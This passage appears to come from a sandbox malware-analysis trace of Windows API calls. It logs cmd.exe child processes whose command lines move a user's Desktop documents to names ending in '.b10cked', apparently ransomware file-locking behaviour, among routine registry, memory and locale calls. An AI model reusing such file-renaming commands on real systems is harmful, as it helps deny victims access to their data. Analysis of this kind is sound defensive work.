lpBuffer=0x18eeec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked", lpFilePart=0x0) returned 0x37 [0232.348] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp", nBufferLength=0x104, lpBuffer=0x18eeec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv 
i4OFxmN5_1.odp", lpFilePart=0x0) returned 0x2f [0232.348] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp")) returned 0x20 [0232.348] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp.b10cked"), dwFlags=0x3) returned 1 [0232.349] FindClose (in: hFindFile=0x370e50 | out: hFindFile=0x370e50) returned 1 [0232.349] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18eea0 | out: _Buffer=" 1") returned 9 [0232.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.349] GetFileType (hFile=0x7) returned 0x2 [0232.349] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.349] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18ee2c | out: lpMode=0x18ee2c) returned 1 [0232.350] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.350] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18ee60 | out: lpConsoleScreenBufferInfo=0x18ee60) returned 1 [0232.350] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.350] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18eea0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.350] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18ee84, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ee84*=0x1a) returned 1 [0232.351] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.351] SetConsoleMode (hConsoleHandle=0x7, 
dwMode=0x3) returned 1 [0232.351] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.351] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.351] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.351] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.351] SetConsoleInputExeNameW () returned 0x1 [0232.351] GetConsoleOutputCP () returned 0x1b5 [0232.351] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.351] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.352] exit (_Code=0) Process: id = "612" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16800" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34395 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34396 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34397 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34398 start_va = 
0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 34399 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34400 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34401 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34402 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34403 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34404 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34495 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34496 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34497 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34498 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 34499 start_va = 0x330000 end_va = 0x42ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 34500 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34501 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34502 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34503 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34504 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34505 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34506 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34507 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34508 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34509 start_va = 0x430000 end_va = 0x4f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 34510 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34511 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34512 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34513 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34514 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34515 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34516 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 34517 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 34518 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 850 os_tid = 0x3a4 [0231.499] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaa4 | out: lpSystemTimeAsFileTime=0x1afaa4*(dwLowDateTime=0xbd8afc00, dwHighDateTime=0x1d440a9)) [0231.499] GetCurrentProcessId () returned 0x6dc 
[0231.499] GetCurrentThreadId () returned 0x3a4 [0231.499] GetTickCount () returned 0x3fb6e [0231.499] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa9c | out: lpPerformanceCount=0x1afa9c*=28828859357) returned 1 [0231.500] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.500] __set_app_type (_Type=0x1) [0231.500] __p__fmode () returned 0x76b331f4 [0231.500] __p__commode () returned 0x76b331fc [0231.500] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.500] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.500] GetCurrentThreadId () returned 0x3a4 [0231.500] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3a4) returned 0x38 [0231.500] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.501] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.501] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.501] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.501] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa34 | out: phkResult=0x1afa34*=0x0) returned 0x2 [0231.501] VirtualQuery (in: lpAddress=0x1afa6b, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.501] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.501] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa04, 
dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.501] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.501] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.501] GetConsoleOutputCP () returned 0x1b5 [0231.501] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.501] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.501] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.501] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.502] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.502] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.502] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.502] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.502] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.502] GetEnvironmentStringsW () returned 0x340178* [0231.502] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0231.502] GetEnvironmentStringsW () returned 0x340178* [0231.502] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0231.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, 
phkResult=0x1ae9a4 | out: phkResult=0x1ae9a4*=0x40) returned 0x0 [0231.502] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0xa0, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.502] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x0, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegCloseKey (hKey=0x40) returned 0x0 [0231.503] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9a4 | out: phkResult=0x1ae9a4*=0x40) returned 0x0 
[0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x0, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0231.503] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0231.503] RegCloseKey (hKey=0x40) returned 0x0 [0231.503] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.503] srand (_Seed=0x5b8863bf) [0231.503] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" 
\"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"" [0231.503] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"" [0231.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.504] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.504] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.504] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.504] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.504] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.504] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.504] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.504] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.504] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.504] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.504] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.504] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.504] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.504] GetEnvironmentStringsW () returned 0x3422c8* [0231.504] FreeEnvironmentStringsW (penv=0x3422c8) returned 1 [0231.504] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.504] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.504] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.504] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.504] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.504] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.504] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.504] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.504] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.504] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.505] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af770 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.505] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af770, lpFilePart=0x1af76c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af76c*="Desktop") returned 0x18 [0231.505] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.505] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x340008 [0231.505] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0231.505] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x340008 [0231.505] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0231.505] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x340008 [0231.505] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0231.505] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" 
(normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.505] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.505] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.505] GetEnvironmentStringsW () returned 0x342ae8* [0231.506] FreeEnvironmentStringsW (penv=0x342ae8) returned 1 [0231.506] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.506] GetConsoleOutputCP () returned 0x1b5 [0231.506] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.506] GetUserDefaultLCID () returned 0x409 [0231.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="0") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="0") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="1") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.507] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.507] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.507] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.508] GetConsoleTitleW (in: lpConsoleTitle=0x3308d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.508] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.508] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0231.508] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0231.508] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0231.509] _wcsicmp (_String1="move", _String2=")") returned 68 [0231.509] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0231.509] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0231.509] _wcsicmp (_String1="IF", _String2="move") returned -4 [0231.509] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0231.509] _wcsicmp (_String1="REM", _String2="move") returned 5 [0231.509] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0231.512] GetConsoleTitleW (in: 